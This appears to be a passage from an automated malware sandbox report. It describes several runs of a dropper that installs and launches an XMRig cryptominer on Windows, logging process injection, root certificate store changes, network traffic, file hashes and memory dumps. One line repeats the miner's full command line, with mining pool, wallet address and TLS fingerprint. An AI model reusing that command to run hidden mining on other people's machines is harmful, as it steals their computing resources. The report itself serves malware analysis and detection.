memory/1616-73-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-74-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-75-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-76-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-77-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-78-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-79-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-80-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-81-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-82-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-83-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-84-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-22 14:31
Reported
2024-05-22 15:15
Platform
win10v2004-20240426-en
Max time kernel
1793s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2424 wrote to memory of 3312 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2424 wrote to memory of 3312 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.10.44.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3312-16-0x000001CED4A50000-0x000001CED4A70000-memory.dmp
memory/3312-17-0x000001CED4A90000-0x000001CED4AB0000-memory.dmp
memory/3312-18-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-20-0x000001CED4AD0000-0x000001CED4AF0000-memory.dmp
memory/3312-19-0x000001CED4AB0000-0x000001CED4AD0000-memory.dmp
memory/3312-21-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-22-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-25-0x000001CED4AD0000-0x000001CED4AF0000-memory.dmp
memory/3312-24-0x000001CED4AB0000-0x000001CED4AD0000-memory.dmp
memory/3312-23-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-26-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-27-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-28-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-29-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-30-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-31-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-32-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-33-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-34-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-35-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-36-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-37-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-38-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-39-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-40-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-41-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-42-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-43-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-44-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-45-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-46-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-47-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-48-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-49-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-50-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-51-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-52-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-53-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-54-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-55-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-56-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-57-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-58-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-59-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-60-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-61-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-62-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-63-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-64-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-65-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-66-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-67-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-68-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-69-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-70-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-71-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-72-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-73-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-74-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-75-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-76-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-77-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-78-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-79-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-80-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-81-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-82-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-83-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-84-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-05-22 14:31
Reported
2024-05-22 15:15
Platform
win10v2004-20240508-en
Max time kernel
1792s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3572 wrote to memory of 4024 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3572 wrote to memory of 4024 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.112.168.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4024-16-0x000001DA44DB0000-0x000001DA44DD0000-memory.dmp
memory/4024-17-0x000001DA44E00000-0x000001DA44E20000-memory.dmp
memory/4024-18-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-21-0x000001DA44E20000-0x000001DA44E40000-memory.dmp
memory/4024-20-0x000001DA44E40000-0x000001DA44E60000-memory.dmp
memory/4024-19-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-22-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-25-0x000001DA44E20000-0x000001DA44E40000-memory.dmp
memory/4024-24-0x000001DA44E40000-0x000001DA44E60000-memory.dmp
memory/4024-23-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-26-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-27-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-28-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-29-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-30-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-31-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-32-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-33-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-34-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-35-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-36-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-37-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-38-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-39-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-40-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-41-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-42-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-43-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-44-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-45-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-46-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-47-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-48-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-49-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-50-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-51-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-52-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-53-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-54-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-55-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-56-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-57-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-58-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-59-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-60-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-61-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-62-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-63-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-64-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-65-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-66-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-67-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-68-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-69-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-70-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-71-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-72-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-73-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-74-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-75-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-76-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-77-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-78-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-79-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-80-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-81-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-82-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-83-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-84-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-05-22 14:31
Reported
2024-05-22 15:16
Platform
win10v2004-20240508-en
Max time kernel
1793s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13e